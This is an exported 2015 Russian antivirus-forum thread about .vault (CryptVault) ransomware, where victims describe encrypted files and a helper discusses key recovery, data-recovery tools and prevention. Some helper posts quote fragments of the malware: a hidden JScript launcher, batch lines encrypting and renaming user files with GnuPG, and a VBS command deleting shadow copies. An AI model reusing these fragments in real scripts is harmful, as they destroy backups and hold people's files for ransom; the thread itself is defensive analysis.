Форум esetnod32.ru [тема: файлы зашифрованы с расширением .vault] http://forum.esetnod32.ru Новое в теме файлы зашифрованы с расширением .vault форума на сайте Форум esetnod32.ru [forum.esetnod32.ru] ru http://backend.userland.com/rss2 Wed, 22 Apr 2026 05:04:44 +0300 файлы зашифрованы с расширением .vault файлы зашифрованы с расширением .vault bat encoder /CryptVault в форуме Шифровальщики файлов и подбор дешифраторов.
Ильдар, когда было шифрование по дате?
19.11.2015 19:41:10, santy.]]> http://forum.esetnod32.ru/messages/forum35/topic13305/message89387/ http://forum.esetnod32.ru/messages/forum35/topic13305/message89387/ Thu, 19 Nov 2015 19:41:10 +0300 Шифровальщики файлов и подбор дешифраторов файлы зашифрованы с расширением .vault файлы зашифрованы с расширением .vault bat encoder /CryptVault в форуме Шифровальщики файлов и подбор дешифраторов.
На мой компьютер проник вирус (баннер) и испортил все текстовые документы, переведя их в формат Vault


19.11.2015 18:06:48, Ильдар Арасланов.]]> http://forum.esetnod32.ru/messages/forum35/topic13305/message89386/ http://forum.esetnod32.ru/messages/forum35/topic13305/message89386/ Thu, 19 Nov 2015 18:06:48 +0300 Шифровальщики файлов и подбор дешифраторов файлы зашифрованы с расширением .vault файлы зашифрованы с расширением .vault bat encoder /CryptVault в форуме Шифровальщики файлов и подбор дешифраторов.
вот этот скриптик надо удалять

====quote====
echo var cdp="%%TEMP%%\\a01dc229.cmd";var WshShell=CreateObject("WScript.Shell");cdp=WshShell.ExpandEnvironmentStrings(cdp);function CreateObject(fq){return new ActiveXObject(fq)}function xx(cdp){WshShell.Run(cdp,0,0);}>> "%temp%\7c62070c.js"

=============
тот что выше, похоже, используют как обманку для антивируса. два однотипных скрипта, но только один из них запускает процесс шифрования.
а на него как раз - ноль реакции, хотя именно он содержит ссылку на командный файл a01dc229.cmd, в котором собраны все команды шифрования файлов. после обхода дисков и очистки от лишних строк.

вот с этим содержимым и надо ловить файл, здесь инфы предостаточно, чтобы отловить его.

====quote====
chcp 866
"%TeMp%\d4a76286.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "C:\файлы для тестирования шифровальщиков\15092014 16_55_03.xls"& move /y "C:\файлы для тестирования шифровальщиков\15092014 16_55_03.xls.gpg" "C:\файлы для тестирования шифровальщиков\15092014 16_55_03.xls"& rename "C:\файлы для тестирования шифровальщиков\15092014 16_55_03.xls" "15092014 16_55_03.xls.vault"
"%TeMp%\d4a76286.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "C:\файлы для тестирования шифровальщиков\32 ремонтный завод .xls"& move /y "C:\файлы для тестирования шифровальщиков\32 ремонтный завод .xls.gpg" "C:\файлы для тестирования шифровальщиков\32 ремонтный завод .xls"& rename "C:\файлы для тестирования шифровальщиков\32 ремонтный завод .xls" "32 ремонтный завод .xls.vault"

=============

28.10.2015 15:17:02, santy.]]> http://forum.esetnod32.ru/messages/forum35/topic13305/message88763/ http://forum.esetnod32.ru/messages/forum35/topic13305/message88763/ Wed, 28 Oct 2015 15:17:02 +0300 Шифровальщики файлов и подбор дешифраторов файлы зашифрованы с расширением .vault файлы зашифрованы с расширением .vault bat encoder /CryptVault в форуме Шифровальщики файлов и подбор дешифраторов.
Это меня и удивило - антивирус его в принципе распознает, но не распознал в момент запуска/создания/работы, да и шифрование процесс не такой быстрый.  
28.10.2015 15:16:40, Станислав Перевозников.]]> http://forum.esetnod32.ru/messages/forum35/topic13305/message88762/ http://forum.esetnod32.ru/messages/forum35/topic13305/message88762/ Wed, 28 Oct 2015 15:16:40 +0300 Шифровальщики файлов и подбор дешифраторов файлы зашифрованы с расширением .vault файлы зашифрованы с расширением .vault bat encoder /CryptVault в форуме Шифровальщики файлов и подбор дешифраторов.
27.10.2015 11:15:29 Защита в режиме реального времени файл C:\Users\23\AppData\Local\Temp\27ddf88e.js BAT/Filecoder.AG троянская программа очищен удалением - изолирован 23-ПК\23 Событие произошло в новом файле, созданном следующим приложением: C:\Windows\System32\cmd.exe.


====quote====
echo var cdp="%%TEMP%%\\05542988.cmd";var WshShell=CreateObject("WScript.Shell");cdp=WshShell.ExpandEnvironmentStrings(cdp);function CreateObject(fq){return new ActiveXObject(fq)}function xx(cdp){WshShell.Run(cdp,0,0);}xx(''+cdp+'');> "%temp%\27ddf88e.js"

=============

этот скриптик, скорее всего уже после запуска был удален. здесь удаление файла не повлияло на процесс шифрования.
28.10.2015 15:10:09, santy.]]> http://forum.esetnod32.ru/messages/forum35/topic13305/message88761/ http://forum.esetnod32.ru/messages/forum35/topic13305/message88761/ Wed, 28 Oct 2015 15:10:09 +0300 Шифровальщики файлов и подбор дешифраторов файлы зашифрованы с расширением .vault файлы зашифрованы с расширением .vault bat encoder /CryptVault в форуме Шифровальщики файлов и подбор дешифраторов.

====quote====
santy написал:
Станислав,
если не трудно, добавьте  лог журнала обнаружения угроз.
судя по рисунку, ESET прибил скриптик vbs, который удаляет теневые копии, возможно до его запуска, потому теневые копии сохранились
=============

Но, частично он их испортил - тк в свойствах документа версий не было, только через прогу нашлись.
esset_export.txt
28.10.2015 14:56:14, Станислав Перевозников.]]> http://forum.esetnod32.ru/messages/forum35/topic13305/message88760/ http://forum.esetnod32.ru/messages/forum35/topic13305/message88760/ Wed, 28 Oct 2015 14:56:14 +0300 Шифровальщики файлов и подбор дешифраторов файлы зашифрованы с расширением .vault файлы зашифрованы с расширением .vault bat encoder /CryptVault в форуме Шифровальщики файлов и подбор дешифраторов.
Станислав,
если не трудно, добавьте лог журнала обнаружения угроз.
судя по рисунку, ESET прибил скриптик vbs, который удаляет теневые копии, возможно до его запуска, потому теневые копии сохранились

судя по коду шифратора так и есть.
====code==== 
echo Set objShell = CreateObject^("Shell.Application"^) > "%temp%\59665d79.vbs"
echo Set objWshShell = WScript.CreateObject^("WScript.Shell"^) >> "%temp%\59665d79.vbs"
echo Set objWshProcessEnv = objWshShell.Environment^("PROCESS"^) >> "%temp%\59665d79.vbs"
echo objShell.ShellExecute "wmic.exe", "shadowcopy delete /nointeractive", "", "runas", 0 >> "%temp%\59665d79.vbs"
=============
28.10.2015 14:50:33, santy.]]> http://forum.esetnod32.ru/messages/forum35/topic13305/message88759/ http://forum.esetnod32.ru/messages/forum35/topic13305/message88759/ Wed, 28 Oct 2015 14:50:33 +0300 Шифровальщики файлов и подбор дешифраторов файлы зашифрованы с расширением .vault файлы зашифрованы с расширением .vault bat encoder /CryptVault в форуме Шифровальщики файлов и подбор дешифраторов.
Добрый день!
На работе словли эту напасть. Обидно, что за два дня до этого активировали купленную лицензию на SMART SECURITY, в замен Каспера (который, если верить сети, эту гадость ловит:(). Маил письмо пропустил, хотя попытку переслать это письмо мне пресек. Антивирус тоже сфилонил.

Шифратор отработал, ключ потер. Но теневые копии нашлись через ShadowExplorer (хотя в свойствах файлов Предыдущих версий уже не было) - спасибо Вам за наводку.

Посмотрел отчет, как отработал Esset (скрин прилагаю) - отловил KillBackup, Filecoder, Runner.BC (ну, хоть за это большое спасибо ему). Хотя непонятно, он его отловил, но как-то частично - более 15 000 документов и картинок зашифровано, ключ потерт. Фото тер по непонятному принципу - т.е. потер, но не все.  

28.10.2015 13:54:09, Станислав Перевозников.]]> http://forum.esetnod32.ru/messages/forum35/topic13305/message88754/ http://forum.esetnod32.ru/messages/forum35/topic13305/message88754/ Wed, 28 Oct 2015 13:54:09 +0300 Шифровальщики файлов и подбор дешифраторов файлы зашифрованы с расширением .vault файлы зашифрованы с расширением .vault bat encoder /CryptVault в форуме Шифровальщики файлов и подбор дешифраторов.
Константин Гончаров,
ответил в почту.
опыт показывает за последние полтора года, что пост_реакция часто не успевает за новым ходом мошенников, потому надо  перестраивать работу в направлении реализации превентивных мер: настройка локальных политик, создание правил ХИПС, регулярного создания архивных и теневых копий документов, доведения до пользователей меры опасности при работе в сети с электронной почтой и браузерами.
01.09.2015 05:35:30, santy.]]> http://forum.esetnod32.ru/messages/forum35/topic13305/message87549/ http://forum.esetnod32.ru/messages/forum35/topic13305/message87549/ Tue, 01 Sep 2015 05:35:30 +0300 Шифровальщики файлов и подбор дешифраторов файлы зашифрованы с расширением .vault файлы зашифрованы с расширением .vault bat encoder /CryptVault в форуме Шифровальщики файлов и подбор дешифраторов.
Добрый день! К сожалению, столкнулся с такой же незадачей: сотрудница запустила вирус на своей машине и "зашифровала", естественно крайне важную и необходимую, информацию. По дате отобрал файлы, какие смог найти на компьютере. Отправил на почту santy, указанную выше. Буду очень признателен, если найдется время проверить архив и возможность восстановления информации. Заранее спасибо!
31.08.2015 15:50:24, Константин Гончаров.]]> http://forum.esetnod32.ru/messages/forum35/topic13305/message87531/ http://forum.esetnod32.ru/messages/forum35/topic13305/message87531/ Mon, 31 Aug 2015 15:50:24 +0300 Шифровальщики файлов и подбор дешифраторов файлы зашифрованы с расширением .vault файлы зашифрованы с расширением .vault bat encoder /CryptVault в форуме Шифровальщики файлов и подбор дешифраторов.
Виктор, поздравляю, зачастую, точки восстановления тоже затираются, так что Вам повезло   :)
25.08.2015 12:56:43, Валентин.]]> http://forum.esetnod32.ru/messages/forum35/topic13305/message87413/ http://forum.esetnod32.ru/messages/forum35/topic13305/message87413/ Tue, 25 Aug 2015 12:56:43 +0300 Шифровальщики файлов и подбор дешифраторов файлы зашифрованы с расширением .vault файлы зашифрованы с расширением .vault bat encoder /CryptVault в форуме Шифровальщики файлов и подбор дешифраторов.
Доброй ночи!

Схватил VAULT 21.08.15г  с письмом на mail.с архивом ZIP ,типо с счетом . испробовал все!!  В итоге воспользовался  восстановкой потерянных данных :Компьютер- Рабочий Стол- папка с доками- восстаовить прежнюю версию.  Воссстановилось все!  Все работает . Дублирующие файлы формата VAULT  отсортировал по типу и удалил.
24.08.2015 23:06:24, Виктор Соколин.]]> http://forum.esetnod32.ru/messages/forum35/topic13305/message87409/ http://forum.esetnod32.ru/messages/forum35/topic13305/message87409/ Mon, 24 Aug 2015 23:06:24 +0300 Шифровальщики файлов и подбор дешифраторов файлы зашифрованы с расширением .vault файлы зашифрованы с расширением .vault bat encoder /CryptVault в форуме Шифровальщики файлов и подбор дешифраторов.
по мотивам беседы с Оксаной.

Ищут пожарные, ищет милиция...Ищут давно, Но не могут найти..." (с), С.Маршак.

Очередная активность вулкана по имени ВАУЛТ вновь накрыла своей электронной волной беспечных пользователей, которые уютно устроились у монитора, принимая извергаемый сетевой "пепел" за манну небесную.

восстановить утраченные в результате внезапной атаки (а так же отсутствия архивных и теневых копий) файлы крайне сложно, во-первых, в силу их шифрования, во-вторых, тщательной зачистки оригинальных документов после удаления.

для проверки возможности восстановления удаленных документов после завершения процесса шифрования использовались несколько инструментов:

getdataback,
r-studio,
ontrack easy recovery,
hetman partition recovery,
testdisk,
winhex

для теста использовались несколько папок с документами:
doc, xls, pdf, jpg, rtf, txt, rar

не ставил цели сравнить данные инструменты, кто лучше, быстрее и больше восстановит документов.
надо было просто посмотреть что подобные инструменты могут что-то восстановить после целенаправленного шифрования и удаления документов.
В случае с ВАУЛТОМ цель не достигнута. документов восстановлено минимальное количество, а след секретного ключа (secring.gpg) не найден.

поиски в winhex по известным hex (9501D804558F43D6010400BA49F79C06, 9501D804558F3209010400BE8B3CB164, 9501D80455A4EE32010400B53F95F674), и символьным (-----BEGIN PGP PRIVATE KEY BLOCK-----,-----END PGP PRIVATE KEY BLOCK-----) сигнатурам не дали результат.

отсюда вывод: надежда на восстановление документов специализированными инструментами крайне мала, после того как "их санкции порвали в клочья нашу экономику"

отсюда другая надежда: на превентивную защиту от запуска шифраторов. например, Cryptoprevent, а так же на создание защищенных разделов для документов с помощью HIPS.

(с), chklst.ru
24.08.2015 17:10:01, santy.]]> http://forum.esetnod32.ru/messages/forum35/topic13305/message87407/ http://forum.esetnod32.ru/messages/forum35/topic13305/message87407/ Mon, 24 Aug 2015 17:10:01 +0300 Шифровальщики файлов и подбор дешифраторов файлы зашифрованы с расширением .vault файлы зашифрованы с расширением .vault bat encoder /CryptVault в форуме Шифровальщики файлов и подбор дешифраторов.

====quote====
santy написал:
pubring.gpg обычно не перезаписывается мусором, и не удаляется.
а вот secring.gpg по алгоритму прежде чем удалить, забивают полезную инфу мусором.
=============
Ладно, пойду узнаю сколько стоит это все восстановить....
21.08.2015 17:15:09, Оксана Дубовицкая.]]> http://forum.esetnod32.ru/messages/forum35/topic13305/message87380/ http://forum.esetnod32.ru/messages/forum35/topic13305/message87380/ Fri, 21 Aug 2015 17:15:09 +0300 Шифровальщики файлов и подбор дешифраторов файлы зашифрованы с расширением .vault файлы зашифрованы с расширением .vault bat encoder /CryptVault в форуме Шифровальщики файлов и подбор дешифраторов.
pubring.gpg обычно не перезаписывается мусором, и не удаляется.
а вот secring.gpg по алгоритму прежде чем удалить, забивают полезную инфу мусором.
21.08.2015 17:11:17, santy.]]> http://forum.esetnod32.ru/messages/forum35/topic13305/message87379/ http://forum.esetnod32.ru/messages/forum35/topic13305/message87379/ Fri, 21 Aug 2015 17:11:17 +0300 Шифровальщики файлов и подбор дешифраторов файлы зашифрованы с расширением .vault файлы зашифрованы с расширением .vault bat encoder /CryptVault в форуме Шифровальщики файлов и подбор дешифраторов.
Итак:  trustdb.gpg - 1 кб состояние Утрачен, pubring. gpg - 341 кб состояние Отличное, три файла secring.gpg.lock - 0 кб  состояние Утрачен
21.08.2015 17:09:36, Оксана Дубовицкая.]]> http://forum.esetnod32.ru/messages/forum35/topic13305/message87378/ http://forum.esetnod32.ru/messages/forum35/topic13305/message87378/ Fri, 21 Aug 2015 17:09:36 +0300 Шифровальщики файлов и подбор дешифраторов файлы зашифрованы с расширением .vault файлы зашифрованы с расширением .vault bat encoder /CryptVault в форуме Шифровальщики файлов и подбор дешифраторов.
ну, в случае с VAULT выход определенный есть, идти на поклон к злодеям с мешком денег за плечами.
это если бизнес которые есть перевесит на весах это мешок с деньгами.
на это у них и расчет. что файлы слишком дорогие для некоторых людей могут оказаться.
----------
в плане политик... хотя бы самые простые добавить... ограничить (через локальные политики) запуск исполняемых файлов из архивов.
21.08.2015 17:02:03, santy.]]> http://forum.esetnod32.ru/messages/forum35/topic13305/message87377/ http://forum.esetnod32.ru/messages/forum35/topic13305/message87377/ Fri, 21 Aug 2015 17:02:03 +0300 Шифровальщики файлов и подбор дешифраторов файлы зашифрованы с расширением .vault файлы зашифрованы с расширением .vault bat encoder /CryptVault в форуме Шифровальщики файлов и подбор дешифраторов.

====quote====
santy написал:
надо просто вырасти на порядок - два в знании мер безопасной работы в сети.
а это знание и использование и инструментов защиты, и методов соц.инженерии и актуальных угроз из сети.
это поможет.
правило - поставил антивирус и забыл - уже не работает.
=============
так то я в курсе))) У меня все под контролем (комп не мой, удаленно с тем работаю),а вот у некоторых знаний нет, хотя не факт, что они нужны, ведь невозможно все знать, а когда письмо от партнера с темой акт приема-передачи, то вообще перестаешь что-либо подозревать. Вот нет политики в компаниях в плане безопасности информационной это, да, кинут ссыль на автивирус, скачивайте и все будет норм., но я в это давно уже не верю, просто не открываю писем с незнакомыми мне расширениями и прочее. Все нужные файлы на отдельном винчестере, есть архивация...
А потом,  человек к сисадмину бежит с темой "Поймал вирус", сисадмин грит "Снесем винду и все будет норм", то даже мне домохозяйке с курсами кройки и шитья, и в прошлом работа в логистике, кажется странным. Причем я никак не критикую сисадминов, у меня есть хорошие знакомые сисадмины и мне их жаль ибо пользователи бывают разные, типа "Сначала компьютер включи". Итог: человек работал 3 года за ноутом, весь бизнес в нем и со всем этим придется попрощаться (удаленные файлы в поиске еще и не факт, что найдется).  
21.08.2015 16:39:21, Оксана Дубовицкая.]]> http://forum.esetnod32.ru/messages/forum35/topic13305/message87376/ http://forum.esetnod32.ru/messages/forum35/topic13305/message87376/ Fri, 21 Aug 2015 16:39:21 +0300 Шифровальщики файлов и подбор дешифраторов файлы зашифрованы с расширением .vault файлы зашифрованы с расширением .vault bat encoder /CryptVault в форуме Шифровальщики файлов и подбор дешифраторов.
надо просто вырасти на порядок - два в знании мер безопасной работы в сети.
а это знание и использование и инструментов защиты, и методов соц.инженерии и актуальных угроз из сети.
это поможет.
правило - поставил антивирус и забыл - уже не работает.
21.08.2015 16:33:22, santy.]]> http://forum.esetnod32.ru/messages/forum35/topic13305/message87375/ http://forum.esetnod32.ru/messages/forum35/topic13305/message87375/ Fri, 21 Aug 2015 16:33:22 +0300 Шифровальщики файлов и подбор дешифраторов файлы зашифрованы с расширением .vault файлы зашифрованы с расширением .vault bat encoder /CryptVault в форуме Шифровальщики файлов и подбор дешифраторов.

====quote====
santy написал:
Оксана,
эта история из разряда, бодался теленок со стойкой криптографией.
здесь и квалификация не поможет, только секретный ключ, на изготовление которого по известному pubring.gpg понадобятся сотни лет.
=============
Отличная аналогия)))))) я то все думаю как себя назвать)))))))  
21.08.2015 16:26:29, Оксана Дубовицкая.]]> http://forum.esetnod32.ru/messages/forum35/topic13305/message87374/ http://forum.esetnod32.ru/messages/forum35/topic13305/message87374/ Fri, 21 Aug 2015 16:26:29 +0300 Шифровальщики файлов и подбор дешифраторов файлы зашифрованы с расширением .vault файлы зашифрованы с расширением .vault bat encoder /CryptVault в форуме Шифровальщики файлов и подбор дешифраторов.
Оксана,
эта история из разряда, бодался теленок со стойкой криптографией. :)
здесь и квалификация не поможет, только секретный ключ, на изготовление которого по известному pubring.gpg понадобятся сотни машинных лет.
----------
т.е. здесь надо искать не противоядие... уже поздно, а реализовать надежные меры по защите,
чтобы не повторилось все сначала.
21.08.2015 16:24:29, santy.]]> http://forum.esetnod32.ru/messages/forum35/topic13305/message87373/ http://forum.esetnod32.ru/messages/forum35/topic13305/message87373/ Fri, 21 Aug 2015 16:24:29 +0300 Шифровальщики файлов и подбор дешифраторов файлы зашифрованы с расширением .vault файлы зашифрованы с расширением .vault bat encoder /CryptVault в форуме Шифровальщики файлов и подбор дешифраторов.

====quote====
santy написал:
вообще чудеса с ВАУЛТом случаются, хотя и редко.
впервые я столкнулся с ним год назад (тогда это был не VAULT,    а бат.энкодер   , но с таким же принципом работы и методом шифрования), когда необходимо было восстановить множество зашифрованных файлов на локальном и сетевых дисках.
тогда расширения файлов были doc.gpg. xls.gpg.
оказалось, что файлы не были зашифрованы, а всего лишь переименованы, при том, что private.key и unique.key были зашифрованы по настоящему.

но больше так не везло уже.
=============
Для меня это все перешло в переквалификацию и спортивный интерес)))) Я пережила все деструктивные чувства))), теперь я в амебном состоянии сижу и что-то делаю))) Если есть яд, то есть и противоядие, хотя на Луну придумали как летать, а как бороться с такими вирусами, нет
21.08.2015 16:14:12, Оксана Дубовицкая.]]> http://forum.esetnod32.ru/messages/forum35/topic13305/message87372/ http://forum.esetnod32.ru/messages/forum35/topic13305/message87372/ Fri, 21 Aug 2015 16:14:12 +0300 Шифровальщики файлов и подбор дешифраторов файлы зашифрованы с расширением .vault файлы зашифрованы с расширением .vault bat encoder /CryptVault в форуме Шифровальщики файлов и подбор дешифраторов.
вообще чудеса с ВАУЛТом случаются, хотя и редко.
впервые я столкнулся с ним год назад (тогда это был не VAULT, а бат.энкодер, но с таким же принципом работы и методом шифрования), когда необходимо было восстановить множество зашифрованных файлов на локальном и сетевых дисках.
тогда расширения файлов были doc.gpg. xls.gpg.
оказалось, что файлы не были зашифрованы, а всего лишь переименованы, при том, что private.key и unique.key были зашифрованы по настоящему.

но больше так не везло уже. :)
21.08.2015 16:08:35, santy.]]> http://forum.esetnod32.ru/messages/forum35/topic13305/message87370/ http://forum.esetnod32.ru/messages/forum35/topic13305/message87370/ Fri, 21 Aug 2015 16:08:35 +0300 Шифровальщики файлов и подбор дешифраторов файлы зашифрованы с расширением .vault файлы зашифрованы с расширением .vault bat encoder /CryptVault в форуме Шифровальщики файлов и подбор дешифраторов.

====quote====
santy написал:
пробуйте искать testdisk-ом, getdataback, r-studio, recula
причем, программы лучше устанавливать и запускать с другого диска,
а не там где был запуск шифратора.

вторая и третья программы - платные.
не факт что найдется ключ, по ничто не мешает проверить... а вдруг..., он там в темпе среди удаленных лежит и ждет вас, чтобы помочь с расшифровкой.
=============
Спасибо))) Да, 4ый день/ночь/день/ночь/....верю в то, что она меня ждет))))) ищу с помощью  recula
21.08.2015 16:01:34, Оксана Дубовицкая.]]> http://forum.esetnod32.ru/messages/forum35/topic13305/message87367/ http://forum.esetnod32.ru/messages/forum35/topic13305/message87367/ Fri, 21 Aug 2015 16:01:34 +0300 Шифровальщики файлов и подбор дешифраторов файлы зашифрованы с расширением .vault файлы зашифрованы с расширением .vault bat encoder /CryptVault в форуме Шифровальщики файлов и подбор дешифраторов.
пробуйте искать testdisk-ом, getdataback, r-studio, recula
причем, программы лучше устанавливать и запускать с другого диска,
а не там где был запуск шифратора.

вторая и третья программы - платные.
не факт что найдется ключ, по ничто не мешает проверить... а вдруг..., он там в темпе среди удаленных лежит и ждет вас, чтобы помочь с расшифровкой.
21.08.2015 15:50:05, santy.]]> http://forum.esetnod32.ru/messages/forum35/topic13305/message87363/ http://forum.esetnod32.ru/messages/forum35/topic13305/message87363/ Fri, 21 Aug 2015 15:50:05 +0300 Шифровальщики файлов и подбор дешифраторов файлы зашифрованы с расширением .vault файлы зашифрованы с расширением .vault bat encoder /CryptVault в форуме Шифровальщики файлов и подбор дешифраторов.
Ок. Есть смысл искать в удаленных файлах? Какой программой я смогу его найти?  
21.08.2015 14:43:38, Оксана Дубовицкая.]]> http://forum.esetnod32.ru/messages/forum35/topic13305/message87358/ http://forum.esetnod32.ru/messages/forum35/topic13305/message87358/ Fri, 21 Aug 2015 14:43:38 +0300 Шифровальщики файлов и подбор дешифраторов файлы зашифрованы с расширением .vault файлы зашифрованы с расширением .vault bat encoder /CryptVault в форуме Шифровальщики файлов и подбор дешифраторов.
расшифровать документы можно , если сможете восстановить secring.gpg
в противном случае помогут только мошенники, но за ваши деньги.
21.08.2015 14:29:55, santy.]]> http://forum.esetnod32.ru/messages/forum35/topic13305/message87357/ http://forum.esetnod32.ru/messages/forum35/topic13305/message87357/ Fri, 21 Aug 2015 14:29:55 +0300 Шифровальщики файлов и подбор дешифраторов файлы зашифрованы с расширением .vault файлы зашифрованы с расширением .vault bat encoder /CryptVault в форуме Шифровальщики файлов и подбор дешифраторов.

====quote====
santy написал:

====quote====
Оксана Дубовицкая   написал:
Еще есть какой-то ddae25beb5b57d6e .hta
=============
это файл заставки, которая всплывает после завершения шифрования, на результат расшифровки он не влияет.
=============
И? Я перечитала весь форум. Пошел день 4й.  Есть ли возможность восстановить все?
21.08.2015 14:01:25, Оксана Дубовицкая.]]> http://forum.esetnod32.ru/messages/forum35/topic13305/message87355/ http://forum.esetnod32.ru/messages/forum35/topic13305/message87355/ Fri, 21 Aug 2015 14:01:25 +0300 Шифровальщики файлов и подбор дешифраторов файлы зашифрованы с расширением .vault файлы зашифрованы с расширением .vault bat encoder /CryptVault в форуме Шифровальщики файлов и подбор дешифраторов.

====quote====
Оксана Дубовицкая написал:
Еще есть какой-то ddae25beb5b57d6e .hta
=============
это файл заставки, которая всплывает после завершения шифрования, на результат расшифровки он не влияет.
21.08.2015 13:03:17, santy.]]> http://forum.esetnod32.ru/messages/forum35/topic13305/message87350/ http://forum.esetnod32.ru/messages/forum35/topic13305/message87350/ Fri, 21 Aug 2015 13:03:17 +0300 Шифровальщики файлов и подбор дешифраторов файлы зашифрованы с расширением .vault файлы зашифрованы с расширением .vault bat encoder /CryptVault в форуме Шифровальщики файлов и подбор дешифраторов.

====quote====
santy написал:
Оксана, когда было шифрование?
по проблеме с расшифровкой документов прочитайте
ВАУЛТ. что делать?
http://chklst.ru/forum/discussion/1481/vault-chto-delat
=============
Добрый день! Шифрование было 17.08.15 с 16.00-17.00. Я почитала "Что делать".
Установила программу для восстановления удаленных файлов, чтобы найти файлы указанные в "Что делать", но либо я не там смотрю, либо их нет. Не сильна я в этих вопросах.
В общем, вопрос остался открытым. Еще есть какой-то ddae25beb5b57d6e .hta
21.08.2015 12:23:42, Оксана Дубовицкая.]]> http://forum.esetnod32.ru/messages/forum35/topic13305/message87345/ http://forum.esetnod32.ru/messages/forum35/topic13305/message87345/ Fri, 21 Aug 2015 12:23:42 +0300 Шифровальщики файлов и подбор дешифраторов